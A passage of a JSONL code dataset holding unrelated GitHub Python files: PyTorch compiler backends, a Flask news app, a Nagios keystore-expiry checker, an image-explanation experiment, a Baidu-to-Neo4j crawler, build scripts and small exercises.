example_inputs)\n\n\ndef ltc_trivial(gm: torch.fx.GraphModule, example_inputs):\n ltc = _init_ltc()\n lazy_model = copy.deepcopy(gm).to(device=\"lazy\")\n ltc.extract_compiled_graph.force_lazy_device(lazy_model)\n\n def ltc_model(*inputs):\n orig_device = inputs[0].device if len(inputs) > 0 else \"cuda\"\n lazy_inputs = tuple(inp.to(device=\"lazy\") for inp in inputs)\n\n lazy_out = lazy_model(*lazy_inputs)\n out = tuple(out.to(device=orig_device) for out in lazy_out)\n return out\n\n return ltc_model\n\n\n@create_backend\ndef torchxla_trivial(subgraph):\n return subgraph.model\n\n\n@create_backend\ndef torchxla_trace_once(subgraph):\n import torch._dynamo.optimizations.torchxla_integration as integration\n\n compiled_graph = None\n model = subgraph.model\n\n def fwd(*args):\n nonlocal subgraph\n nonlocal compiled_graph\n if compiled_graph is None:\n compiled_graph = integration.extract_compiled_graph(model, args)\n del subgraph\n return compiled_graph(*args)\n\n return fwd\n\n\ndef ipex_fp32(gm: torch.fx.GraphModule, example_inputs):\n kwargs_ipex = {\"datatype\": \"fp32\"}\n return BACKENDS[\"ipex\"](gm, example_inputs, **kwargs_ipex)\n\n\ndef ipex_bf16(gm: torch.fx.GraphModule, example_inputs):\n kwargs_ipex = {\"datatype\": \"bf16\"}\n return BACKENDS[\"ipex\"](gm, example_inputs, **kwargs_ipex)\n\n\ndef fx2trt_compiler_fp16(gm: torch.fx.GraphModule, example_inputs):\n kwargs_fx2trt = {\"fp16_mode\": True}\n trt_compiled = BACKENDS[\"fx2trt\"](gm, example_inputs, **kwargs_fx2trt)\n if trt_compiled is not None:\n return trt_compiled\n else:\n print(\n \"FX2TRT conversion failed on the subgraph. Return GraphModule forward instead\"\n )\n return gm.forward\n\n\ndef fx2trt_compiler(gm: torch.fx.GraphModule, example_inputs):\n kwargs_fx2trt = {\"fp16_mode\": False}\n trt_compiled = BACKENDS[\"fx2trt\"](gm, example_inputs, **kwargs_fx2trt)\n if trt_compiled is not None:\n return trt_compiled\n else:\n print(\n \"FX2TRT conversion failed on the subgraph. Return GraphModule forward instead\"\n )\n return gm.forward\n","repo_name":"robit-man/AGX-ORIN-TORCH-PACKAGES","sub_path":"site-packages/torch/_dynamo/optimizations/backends.py","file_name":"backends.py","file_ext":"py","file_size_in_byte":24188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21149377994","text":"class Solution:\n def slowestKey(self, releaseTimes: List[int], keysPressed: str) -> str:\n # Time and Space Complexity: O(N)\n durations = {}\n for i, char in enumerate(keysPressed):\n start = 0 if not i else releaseTimes[i - 1]\n duration = releaseTimes[i] - start\n durations[char] = max(duration, durations.get(char, 0))\n\n return max([(durations[char], char) for char in durations])[1]\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1629. Slowest Key/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"33035783376","text":"from flask import current_app, render_template, session, request, jsonify\n\nfrom Info.constants import CLICK_RANK_MAX_NEWS, HOME_PAGE_MAX_NEWS\nfrom Info.models import User, News, Category\nfrom Info.modules.home import home_blu\n\n\n# 2.使用蓝图来装饰路由\nfrom Info.utils.response_code import RET, error_map\n\n\n@home_blu.route('/')\ndef index():\n # 判断用户是否登陆\n user_id = session.get(\"user_id\")\n user = None # 当某些极端情况下,user_id没有值,这样从库里就取不出数据,但是模板渲染里仍要传值,这时需要相当于对user进行初始化\n if user_id:\n # 根据user_id查询用户模型\n try:\n user = User.query.get(user_id)\n except Exception as e:\n current_app.logger.error(e)\n # 将用户登陆信息传到模板中\n user = user.to_dict() if user else None # 三元运算,将user模型中的数据进行字典中的封装(如果user存在进行to_dict()操作,否则user为none)\n\n # 查询新闻 按照点击量的倒序排列 取前10条\n rank_list = []\n try:\n rank_list = News.query.order_by(News.clicks.desc()).limit(CLICK_RANK_MAX_NEWS).all()\n except Exception as e:\n current_app.logger.error(e)\n\n rank_list = [news.to_basic_dict() for news in rank_list]\n\n # 原html页面中各个类别是写死的,这里可以从数据库中取出值进行全局渲染\n categories = []\n try:\n categories = Category.query.all()\n except Exception as e:\n current_app.logger.error(e)\n\n return render_template(\"news/index.html\", user=user, rank_list=rank_list, categories=categories) # 不能直接对其中的user=user.todict(),因为user可能为none,这样会报错\n\n\n# 设置图标(浏览器只会请求一次,不管是否请求到之后都不会请求了)\n@home_blu.route('/favicon.ico')\ndef favicon():\n # send_static_file用于返回静态文件(详细见day08个人笔记)\n return current_app.send_static_file(\"news/favicon.ico\")\n\n\n# 获取新闻列表\n@home_blu.route('/get_news_list')\ndef get_news_list():\n # 获取参数\n cid = request.args.get(\"cid\") # 新闻类型\n cur_page = request.args.get(\"cur_page\") # 当前页码\n per_count = request.args.get(\"per_count\",HOME_PAGE_MAX_NEWS) # 每页新闻个数\n # 校验参数\n if not all([cid, cur_page]):\n return jsonify(errno=RET.PARAMERR, errmsg=error_map[RET.PARAMERR])\n\n # 将参数转为整形(从请求中获取的数据统一是str)\n try:\n cid = int(cid)\n per_count = int(per_count)\n cur_page = int(cur_page)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.PARAMERR, errmsg=error_map[RET.PARAMERR])\n\n filter_list = [News.status == 0] # 只有审核通过的文章才能被战士\n if cid != 1: # 因为类别1并不是对应的类别,而是取最新(根据发布时间来获得)\n filter_list.append(News.category_id == cid)\n # 根据参数查询新闻数据 按照分类进行分页查询(生成日期倒序)\n try:\n pn = News.query.filter(*filter_list).order_by(News.create_time.desc()).paginate(cur_page,per_count)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=error_map[RET.DBERR])\n\n data = {\n \"news_list\": [news.to_dict() for news in pn.items], # 自定义类型的数据不能转换为json字符串,所以需要将其转换为字典\n \"total_page\": pn.pages # 用于帮助前端判断最终页\n }\n\n # 将数据以json返回\n return jsonify(errno=RET.OK, errmsg=error_map[RET.OK], data=data)\n","repo_name":"CcLmL/InfoNews","sub_path":"Info/modules/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9783455660","text":"#!/usr/bin/env python\n# or !/usr/bin/env python3 depending on the version you have\n\nfrom datetime import datetime\nimport subprocess\nimport sys\n\ntoday = datetime.now()\n\n\ndef get_expiration_from_file(ksName,passphrase):\n with open(ksName) as c:\n try:\n # Command that is run here: keytool -list -v -keystore example.jks -storepass 12345678\n nextUpdate = subprocess.check_output([\"/usr/bin/keytool\", \"-list\", \"-v\",\"-keystore\", ksName,\"-storepass\",passphrase], stderr=subprocess.STDOUT).decode('ascii')\n nextUpdate = nextUpdate.split(\"until: \")\n nextUpdate = nextUpdate[1:]\n \n results = []\n for cert in nextUpdate:\n cert = cert.split(\"\\n\")[0]\n # Data before splitting: 'Fri Sep 09 20:04:04 CEST 2022'\n exp_date = datetime.strptime(cert, \"%a %b %d %H:%M:%S %Z %Y\")\n results.append(is_expired(exp_date))\n return results\n except subprocess.CalledProcessError as e:\n print(\"Cert file with error\")\n sys.exit(2)\n\n\ndef is_expired(exp):\n days_to_exp = (exp-today).days\n if days_to_exp <= 15:\n r = [2, (\"CRITICAL Cert about to expire or already expired, run for your lives! : {0} days to expiration\".format(\n days_to_exp))]\n elif days_to_exp < 30:\n r = [2, (\"CRITICAL Cert expiration in less than 30 days: {0} days to expiration\".format(\n days_to_exp))]\n elif days_to_exp < 60:\n r = [1, (\"WARNING Cert expiration in less than 60 days: {0} days to expiration\".format(\n days_to_exp))]\n else:\n r = [\n 0, (\"OK Cert expires in : {0} days to expiration\".format(days_to_exp))]\n return r\n\n\nif len(sys.argv) == 3:\n alerts = get_expiration_from_file(sys.argv[1],sys.argv[2])\n message = \"\"\n maxalert = 0\n for r in alerts:\n if r[0] is not 0:\n message += r[1]\n maxalert = max(maxalert, r[0])\n if maxalert == 0:\n print((\"OK Certs expire in more than {0} days\".format(60)))\n sys.exit(0)\n else: \n print(message)\n sys.exit(maxalert)\n\nelse:\n # Correct calling is ./check_jks.py example.jks 12345678\n print(\"UNKNOWN Plugin was not called correctly\")\n sys.exit(3)\n","repo_name":"franps/nagios-cryppy","sub_path":"check_keystore.py","file_name":"check_keystore.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71207293548","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 8 14:46:21 2020\r\n\r\n@author: TVermeire\r\n\"\"\"\r\n\r\n#%% Libraries\r\n\r\n#from __future__ import absolute_import, division, print_function, unicode_literals\r\nimport time\r\nimport matplotlib.pylab as plt\r\nimport numpy as np\r\nimport PIL.Image as Image\r\nimport os\r\nfrom os import listdir\r\nimport pandas as pd\r\n\r\nimport tensorflow as tf\r\nimport tensorflow_hub as hub\r\n#from tensorflow.keras import layer\r\n\r\nfrom skimage.color import rgb2gray\r\nfrom skimage.filters import sobel\r\nfrom skimage.segmentation import felzenszwalb, slic, quickshift, watershed\r\nfrom skimage.segmentation import mark_boundaries\r\nfrom skimage.util import img_as_float\r\n\r\n\r\n#%% directory\r\n\r\nos.chdir(r'C:\\Users\\tvermeire\\Dropbox\\Doctoraat\\Applied Data Mining\\XAI images\\Spyder')\r\n\r\n#%% Explanation methods\r\nfrom sedc_time import sedc_time\r\n\r\n#%% Model import\r\n\r\nclassifier_url =\"https://tfhub.dev/google/tf2-preview/mobilenet_v2/classification/2\" #@param {type:\"string\"}\r\n\r\nIMAGE_SHAPE = (224, 224)\r\n\r\nclassifier = tf.keras.Sequential([\r\n hub.KerasLayer(classifier_url, input_shape=IMAGE_SHAPE+(3,))\r\n])\r\n\r\nlabels_path = tf.keras.utils.get_file('ImageNetLabels.txt','https://storage.googleapis.com/download.tensorflow.org/data/ImageNetLabels.txt')\r\nimagenet_labels = np.array(open(labels_path).read().splitlines())\r\n\r\n\r\n#%% Image import\r\n\r\n# Import function\r\ndef loadImages(path, imshape):\r\n imagesList = listdir(path)\r\n loadedImages = []\r\n for image in imagesList:\r\n img = Image.open(path + image).resize(imshape)\r\n img = np.array(img)/255.0\r\n # Only add image if right shape and number of channels\r\n if img.shape == (224,224,3): \r\n loadedImages.append(img)\r\n return loadedImages\r\n\r\n#%% Classes to consider\r\n \r\npath = r'C:\\Users\\tvermeire\\Dropbox\\Images'\r\nclasses = listdir(path)\r\n\r\n\r\n#%%\r\n\r\ntime_limit = 15\r\n\r\nfor class_name in classes:\r\n \r\n # Import \r\n path_images = 'C:/Users/tvermeire/Dropbox/Images/' + class_name + '/' \r\n images = loadImages(path_images,IMAGE_SHAPE)\r\n \r\n images = images[0:100]\r\n\r\n\r\n # Create directory\r\n os.chdir(r'C:\\Users\\tvermeire\\Dropbox\\Doctoraat\\Applied Data Mining\\XAI images\\Spyder\\removal_experiment\\output')\r\n os.mkdir(class_name)\r\n \r\n # Experiment\r\n\r\n table = dfObj = pd.DataFrame(columns=['Image', 'k_mean', 's_mean', 'ct_mean', 'nc_mean', 'k_blur', 's_blur', 'ct_blur', 'nc_blur', 'k_random', 's_random', 'ct_random', 'nc_random', 'k_inpaint', 's_inpaint', 'ct_inpaint', 'nc_inpaint'], index = [i for i in range(len(images))])\r\n \r\n n = 0 #index counter\r\n \r\n too_long_mean = 0\r\n too_long_blur = 0\r\n too_long_random = 0\r\n too_long_inpaint = 0\r\n \r\n for image in images: \r\n \r\n # Classify image\r\n result = classifier.predict(image[np.newaxis, ...])\r\n predicted_class = np.argmax(result[0], axis=-1)\r\n \r\n print('Classification done')\r\n \r\n # Segment image\r\n segments = quickshift(image, kernel_size=4, max_dist=200, ratio=0.2)\r\n print('Segmentation done')\r\n \r\n # SEDC mean\r\n \r\n start = time.time()\r\n explanation, segments_in_explanation, perturbation, new_class, too_long = sedc_time(image, classifier, segments, 'mean', time_limit)\r\n stop = time.time()\r\n if too_long == False: \r\n k_mean = len(segments_in_explanation)\r\n s_mean = segments_in_explanation\r\n ct_mean = stop-start\r\n nc_mean = imagenet_labels[new_class]\r\n else: \r\n k_mean = np.nan\r\n s_mean = np.nan\r\n ct_mean = np.nan\r\n nc_mean = np.nan\r\n too_long_mean += 1\r\n \r\n print('SEDC mean done') \r\n \r\n # SEDC blur\r\n \r\n start = time.time()\r\n explanation, segments_in_explanation, perturbation, new_class, too_long = sedc_time(image, classifier, segments, 'blur', time_limit)\r\n stop = time.time()\r\n if too_long == False: \r\n k_blur = len(segments_in_explanation)\r\n s_blur = segments_in_explanation\r\n ct_blur = stop-start\r\n nc_blur = imagenet_labels[new_class]\r\n else: \r\n k_blur = np.nan\r\n s_blur = np.nan\r\n ct_blur = np.nan\r\n nc_blur = np.nan\r\n too_long_blur += 1\r\n \r\n print('SEDC blur done')\r\n \r\n # SEDC random\r\n \r\n start = time.time()\r\n explanation, segments_in_explanation, perturbation, new_class, too_long = sedc_time(image, classifier, segments, 'random', time_limit)\r\n stop = time.time()\r\n if too_long == False:\r\n k_random = len(segments_in_explanation)\r\n s_random = segments_in_explanation\r\n ct_random = stop-start\r\n nc_random = imagenet_labels[new_class]\r\n else: \r\n k_random = np.nan\r\n s_random = np.nan\r\n ct_random = np.nan\r\n nc_random = np.nan\r\n too_long_random += 1\r\n \r\n print('SEDC random done')\r\n \r\n # SEDC inpaint\r\n \r\n start = time.time()\r\n explanation, segments_in_explanation, perturbation, new_class, too_long = sedc_time(image, classifier, segments, 'inpaint', time_limit)\r\n stop = time.time()\r\n if too_long == False: \r\n k_inpaint = len(segments_in_explanation)\r\n s_inpaint = segments_in_explanation\r\n ct_inpaint = stop-start \r\n nc_inpaint = imagenet_labels[new_class]\r\n else: \r\n k_inpaint = np.nan\r\n s_inpaint = np.nan\r\n ct_inpaint = np.nan\r\n nc_inpaint = np.nan\r\n too_long_inpaint += 1\r\n \r\n print('SEDC inpaint done')\r\n \r\n # Put metrics in table\r\n \r\n table['Image'][n] = image\r\n table['k_mean'][n] = k_mean\r\n table['s_mean'][n] = s_mean\r\n table['ct_mean'][n] = ct_mean\r\n table['nc_mean'][n] = nc_mean\r\n table['k_blur'][n] = k_blur\r\n table['s_blur'][n] = s_blur\r\n table['ct_blur'][n] = ct_blur\r\n table['nc_blur'][n] = nc_blur\r\n table['k_random'][n] = k_random\r\n table['s_random'][n] = s_random\r\n table['ct_random'][n] = ct_random\r\n table['nc_random'][n] = nc_random\r\n table['k_inpaint'][n] = k_inpaint\r\n table['s_inpaint'][n] = s_inpaint\r\n table['ct_inpaint'][n] = ct_inpaint\r\n table['nc_inpaint'][n] = nc_inpaint\r\n \r\n n += 1\r\n print(\"Image \" + str(n) + \" done\")\r\n\r\n # Output table \r\n os.chdir('C:/Users/tvermeire/Dropbox/Doctoraat/Applied Data Mining/XAI images/Spyder/removal_experiment/output/'+ class_name)\r\n with pd.ExcelWriter(class_name + '.xlsx') as writer: \r\n table.to_excel(writer)\r\n os.chdir(r'C:\\Users\\tvermeire\\Dropbox\\Doctoraat\\Applied Data Mining\\XAI images\\Spyder')\r\n \r\n \r\n","repo_name":"ADMAntwerp/ImageCounterfactualExplanations","sub_path":"isedc/experiment_comparison_sedc_removal.py","file_name":"experiment_comparison_sedc_removal.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"43099097433","text":"import requests\nfrom lxml import etree\nfrom py2neo import *\n\nhead = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n}\ngraph = Graph(\"http://127.0.0.1:7474\", username=\"neo4j\", password=\"123456\")\nnode_matcher = NodeMatcher(graph)\nr_matcher = RelationshipMatcher(graph)\n\n#爬取角色URL列表\ndef create_role_list(movie_url):\n html = requests.get(movie_url,headers=head)\n html.encoding=\"utf-8\"\n html = html.text\n selector = etree.HTML(html)\n content = selector.xpath(\"//html\")[0]\n role_list = content.xpath(\"//div[@class='role-name']//a/@href\")\n #name_list = content.xpath(\"//div[@class='role-name']/span/a/text()\")\n role_list = [\"https://baike.baidu.com\"+i for i in role_list]\n return role_list\n\n\n# 爬取角色信息\ndef role_info(url):\n param = {}\n html = requests.get(url, headers=head)\n html.encoding = \"utf-8\"\n html = html.text\n selector = etree.HTML(html)\n content = selector.xpath(\"//html\")[0]\n img = content.xpath(\"//div[@class='summary-pic']//img/@src\")\n if img:\n param['img'] = img[0]\n info_list = content.xpath(\"//dt[@class='basicInfo-item name']/text()\")\n info_value = content.xpath(\"//dd[@class='basicInfo-item value']\")\n info_len = len(info_list)\n for i in range(0, info_len):\n param[info_list[i].replace('\\xa0', '')] = info_value[i].xpath(\"string(.)\").replace('\\n', '')\n\n if param:\n del param['中文名']\n\n return (param)\n\n\n# 爬取人际关系表 并结合和角色信息一并存入Neo4j数据库\ndef create_relationship(role_url):\n graph = Graph(\"http://127.0.0.1:7474\", username=\"neo4j\", password=\"123456\")\n html = requests.get(role_url, headers=head)\n html.encoding = \"utf-8\"\n html = html.text\n selector = etree.HTML(html)\n content = selector.xpath(\"//html\")[0]\n n_rel = len(content.xpath(\"//div/h2[contains(string(),'关系')]/ancestor::div/following-sibling::\\\n table[1]/tr[position()>1]\"))\n role_name = content.xpath(\"//dd[@class='lemmaWgt-lemmaTitle-title']/h1/text()\")[0]\n\n source = node_matcher.match(name=role_name).first()\n if not source:\n param = role_info(\"https://baike.baidu.com/item/\" + role_name)\n source = Node(\"role\", name=role_name, **param)\n graph.create(source)\n\n for i in range(2, 2 + n_rel):\n target_name = content.xpath(\"//div/h2[contains(string(),'关系')]/ \\\n ancestor::div/following-sibling::table/tr[\" + str(i) + \"]/td[1]//text()\")[0]\n rel = content.xpath(\"//div/h2[contains(string(),'关系')]/ancestor::div/\\\n following-sibling::table/tr[\" + str(i) + \"]/td[2]//text()\")[0]\n desc = content.xpath(\"//div/h2[contains(string(),'关系')]/ancestor::\\\n div/following-sibling::table/tr[\" + str(i) + \"]/td[3]//text()\")[0]\n target = node_matcher.match(name=target_name).first()\n if not target:\n param = role_info(\"https://baike.baidu.com/item/\" + target_name)\n target = Node(\"role\", name=target_name, **param)\n graph.create(target)\n graph.create(Relationship(source, rel, target, describe=desc))\n\n\n#执行\n\ngraph = Graph(\"http://127.0.0.1:7474\", username=\"neo4j\", password=\"123456\")\n\nmovie_url = \"https://baike.baidu.com/item/%E5%8D%83%E4%B8%8E%E5%8D%83%E5%AF%BB\" #《千》百度百科\nrole_list = create_role_list(movie_url)\n\nfor i in role_list:\n create_relationship(i)\n\nnode_matcher = NodeMatcher(graph)\nr_matcher = RelationshipMatcher(graph)\n\n\n#手动调整信息\ngraph = Graph(\"http://127.0.0.1:7474\", username=\"neo4j\", password=\"123456\")\n\n#删除假的“坊”\ngraph.run(\"MATCH ()-[r:宝宝]->(n) DELETE r,n\")\n#添加真的坊关系\ntang = node_matcher.match(name='汤婆婆').first()\nfang = node_matcher.match(name='坊宝宝').first()\ngraph.create(Relationship(tang,'宝宝',fang,describe='坊宝宝是汤屋的主管——汤婆婆的独子'))\n#添加无脸男关系\nlian = node_matcher.match(name='无脸男').first()\nqian = node_matcher.match(name='荻野千寻').first()\ngraph.create(Relationship(lian,'喜欢',qian))\n\n#手动添加小玲信息\nling = node_matcher.match(name='小玲').first()\nling['img'] = \"https://gss3.bdstatic.com/-Po3dSag_xI4khGkpoWK1HF6hhy/baike/w%3D268%3Bg%3D0/sign=a7bc12155bdf8db1bc2e7b623118ba69/7af40ad162d9f2d3acf03762acec8a136227cc5e.jpg\"\nling['性别'] = '女'\ngraph.push(ling)","repo_name":"Cloud-Wong/QianXun","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"22991315212","text":"import os\n\n########################################################################################################################\n\nAlias(\"all\", \".\")\nCacheDir(\"/tmp/\")\nDecider('MD5-timestamp')\nSetOption('max_drift', 1)\nSetOption('implicit_cache', 1)\nSourceCode(\".\", None)\nSetOption('num_jobs', 3)\n\n########################################################################################################################\n\ndef UnitTest(self, target, source):\n cwd = Dir(\"#\").abspath + \"/\"\n self.Program(target, source)\n self[\"TESTBIN\"] = os.path.relpath(target, cwd)\n self[\"TESTRES\"] = \"${TESTBIN}.res\"\n self[\"TESTCOM\"] = \"./${TESTBIN} > ${TESTRES}\"\n self[\"TESTCOMSTR\"] = \"${TESTCOM}\" if self[\"VERBOSE\"] else \" TEST ${TARGET}\"\n test = Action(\"${TESTCOM}\", \"${TESTCOMSTR}\", cwd=cwd)\n self.Command(target + \".res\", target, test)\n \ndef MockMe(self, target, source):\n cwd = Dir(\"#\").abspath + \"/\"\n self[\"MOCKMEDEFINES\"] = \" \".join(\"-D\" + x for x in self.get(\"CPPDEFINES\", []))\n self[\"MOCKMEPATH\"] = \" \".join(\"-I\" + os.path.relpath(str(Dir(x)), cwd) for x in self.get(\"CPPPATH\", []))\n self[\"FAKE_LIBC\"] = \"include/mockme/fake_libc\"\n self[\"MOCKMECOM\"] = \"mockme/mockme ${MOCKMEDEFINES} ${MOCKMEPATH} -I${FAKE_LIBC} ${SOURCE} -o ${TARGET}\"\n self[\"MOCKMECOMSTR\"] = \"${MOCKMECOM}\" if self[\"VERBOSE\"] else \" MOCK ${TARGET}\"\n mockme = Action(\"${MOCKMECOM}\", \"${MOCKMECOMSTR}\", cwd=cwd)\n self.Command(target, [ source, \"#mockme/mockme\" ], mockme)\n \nAddMethod(Environment, UnitTest)\nAddMethod(Environment, MockMe)\n\n########################################################################################################################\n\nvariables = Variables()\nvariables.Add(BoolVariable(\"VERBOSE\", \"set to 1 in order to display the build commands as they are executed\", True))\n \nbase = Environment(variables=variables, ENV=os.environ)\nbase[\"CC\"] = \"gcc -m32\"\nbase[\"OBJPREFIX\"] = \".\"\n\nif not base[\"VERBOSE\"]:\n base[\"CCCOMSTR\"] = \" CC ${TARGET}\"\n base[\"SHCCCOMSTR\"] = \" CC ${TARGET}\"\n base[\"SHLINKCOMSTR\"] = \" LD ${TARGET}\"\n base[\"ARCOMSTR\"] = \" AR ${TARGET}\"\n base[\"LINKCOMSTR\"] = \" LD ${TARGET}\"\n base[\"RANLIBCOMSTR\"] = \" RL ${TARGET}\"\n \nHelp(variables.GenerateHelpText(base))\n\n########################################################################################################################\n\nroot = base.Clone()\nroot.MergeFlags(\"-Wall -Wextra -O3\")\nroot.MergeFlags(\"-ggdb -O0\")\nExport(\"root\")\n\nSConscript(\"mockme/SConscript\")\nSConscript(\"test/SConscript\")\nSConscript(\"demo/SConscript\")\n\n########################################################################################################################\n","repo_name":"meuter/mockme","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"40381713225","text":"\"\"\"\nFASTA formatter\n\"\"\"\nclass FASTAFormatter(object):\n \"\"\"Formatter for FASTA files\"\"\"\n def __init__(self, theme):\n \"\"\"Creates a new FASTAFormatter instance\"\"\"\n import os\n from cats.styles.sequence import SequenceFormatter\n\n # Load sequence formatter\n self.seq_formatter = SequenceFormatter(theme)\n\n def format(self, inbuffer, outbuffer=None, **kwargs):\n \"\"\"Format sequence records\"\"\"\n import sys\n\n # default/bold text\n RESET = '\\033[0m'\n BOLD = '\\033[1m'\n\n # default to STDOUT for output\n if outbuffer is None:\n outbuffer = sys.stdout\n\n # Iterate through and format each sequence record\n if kwargs['color']:\n for line in inbuffer:\n line = line.decode()\n\n # Reset formatting\n outbuffer.write(RESET)\n\n # Print description\n if line.startswith('>'):\n outbuffer.write(BOLD + line)\n continue\n\n # DNA/RNA\n if kwargs['seq_type'] in ['dna', 'rna', 'nucleic_acid']:\n outbuffer.write(self.seq_formatter.format_nucleic_acid(\n line, kwargs['stop_codons'], kwargs['cpg']\n ))\n else:\n # Protein\n outbuffer.write(self.seq_formatter.format_protein(line))\n else:\n for line in inbuffer:\n outbuffer.write(line.decode())\n\nclass UnrecognizedInput(IOError):\n \"\"\"Unrecognized input error\"\"\"\n pass\n","repo_name":"khughitt/cats","sub_path":"cats/formatters/fasta.py","file_name":"fasta.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"19726685423","text":"from twisted.internet.defer import DeferredQueue, inlineCallbacks, maybeDeferred, returnValue\nfrom zope.interface import implementer\n\nfrom scrapyd.interfaces import IPoller\nfrom scrapyd.utils import get_spider_queues\n\n\n@implementer(IPoller)\nclass QueuePoller(object):\n\n def __init__(self, config):\n self.config = config\n self.update_projects()\n self.dq = DeferredQueue()\n\n @inlineCallbacks\n def poll(self):\n if not self.dq.waiting:\n return\n for p, q in self.queues.items():\n c = yield maybeDeferred(q.count)\n if c:\n msg = yield maybeDeferred(q.pop)\n if msg is not None: # In case of a concurrently accessed queue\n returnValue(self.dq.put(self._message(msg, p)))\n\n def next(self):\n return self.dq.get()\n\n def update_projects(self):\n self.queues = get_spider_queues(self.config)\n\n def _message(self, queue_msg, project):\n d = queue_msg.copy()\n d['_project'] = project\n d['_spider'] = d.pop('name')\n return d\n","repo_name":"scrapy/scrapyd","sub_path":"scrapyd/poller.py","file_name":"poller.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":2733,"dataset":"github-code","pt":"37"} +{"seq_id":"71385819309","text":"import json\nimport requests # http requests\n\n\n\nBASE_URL = \"http://127.0.0.1:8000/\"\n\nENDPOINT = \"api/updates/\"\n\n\ndef get_list(id=None): #--> Lists all this out\n data = json.dumps({})\n if id is not None:\n data = json.dumps({\"id\": id})\n r = requests.get(BASE_URL + ENDPOINT, data=data)\n print(r.status_code)\n status_code = r.status_code\n if status_code != 200: # not found\n print('probably not good sign?')\n data = r.json()\n return data\n\n\n\ndef create_update():\n new_data = {\n 'user': 1,\n \"content\": \"Another more cool content\" \n }\n r = requests.post(BASE_URL + ENDPOINT, data=json.dumps(new_data))\n print(r.headers)\n print(r.status_code)\n if r.status_code == requests.codes.ok:\n #print(r.json())\n return r.json()\n return r.text\n\n\nprint(get_list())\n\n# print(create_update())\n\n\ndef do_obj_update():\n new_data = {\n \"id\": 3,\n \"content\": \"awesomer\" \n }\n r = requests.put(BASE_URL + ENDPOINT, data=json.dumps(new_data))\n # new_data = {\n # 'id': 1\n # \"content\": \"Another more cool content\" \n # }\n # r = requests.put(BASE_URL + ENDPOINT, data=new_data)\n #print(r.headers)\n print(r.status_code)\n if r.status_code == requests.codes.ok:\n #print(r.json())\n return r.json()\n return r.text\n\n\ndef do_obj_delete():\n new_data = {\n \"id\": 3\n }\n r = requests.delete(BASE_URL + ENDPOINT, data=json.dumps(new_data))\n # new_data = {\n # 'id': 1\n # \"content\": \"Another more cool content\" \n # }\n # r = requests.put(BASE_URL + ENDPOINT, data=new_data)\n #print(r.headers)\n print(r.status_code)\n if r.status_code == requests.codes.ok:\n #print(r.json())\n return r.json()\n return r.text\n\n\n\n# print(do_obj_update())\n\n\n\n","repo_name":"codingforentrepreneurs/REST-API","sub_path":"scripts/cfe_pure_api.py","file_name":"cfe_pure_api.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":263,"dataset":"github-code","pt":"37"} +{"seq_id":"12069159421","text":"# ### 6092\n# n = int(input())\n# att_list = list(map(int, input().split()))\n# if len(att_list)!=n:\n# exit()\n# std_list = [0] * 23\n# for i in att_list:\n# if i<=0 or i>23:\n# exit()\n# std_list[i-1] +=1\n\n# for i in std_list:\n# print(i, end=' ')\n\n# ### 6093\n# n = int(input())\n# att_list = list(map(int, input().split()))\n# if(len(att_list)!=n):\n# exit()\n# for i in reversed(att_list):\n# print(i, end=' ')\n\n# ### 6094\n# n = int(input())\n# att_list = list(map(int, input().split()))\n\n# if len(att_list)!=n:\n# exit()\n\n# res = att_list[0]\n\n# for i in att_list:\n# res = min(res, i)\n# print(res)\n\n# ### 6095\n# # *** 2차원 배열\n# board = [[0] * 19 for _ in range(19)]\n# n = int(input())\n# for _ in range(n):\n# i, j = input().split()\n# board[int(i)-1][int(j)-1] = 1\n\n# for i in range(19):\n# for j in range(19):\n# if j==18:\n# print(board[i][j])\n# else:\n# print(board[i][j], end = ' ')\n\n# ### 6096\n# board = [[0] * 19 for _ in range(19)]\n# for i in range(19):\n# board[i] = list(map(int, input().split()))\n# if len(board[i]) != 19:\n# exit()\n# n = int(input())\n\n# for _ in range(n):\n# x, y = input().split()\n# x = int(x) -1\n# y = int(y) -1\n# for i in range(19):\n# if board[i][y] == 0:\n# board[i][y] = 1\n# else:\n# board[i][y] = 0\n \n# if board[x][i] == 0:\n# board[x][i] = 1\n# else:\n# board[x][i] = 0\n\n# for i in range(19):\n# for j in range(19):\n# print(board[i][j], end = \" \")\n# print()\n\n# ### 6097\n# h, w = input().split()\n# w = int(w)\n# h = int(h)\n# board = [[0]*w for _ in range(h)]\n\n# n = int(input())\n\n# for _ in range(n):\n# l, d, x, y = input().split()\n# l = int(l)\n# d = int(d)\n# x = int(x) -1\n# y = int(y) -1\n\n# if d == 0:\n# for i in range(l):\n# if y + i < w:\n# board[x][y + i] = 1\n# elif d==1:\n# for i in range(l):\n# if x + i < h:\n# board[x + i][y] = 1\n\n# for i in range(h):\n# for j in range(w):\n# print(board[i][j], end = \" \")\n# print()\n\n### 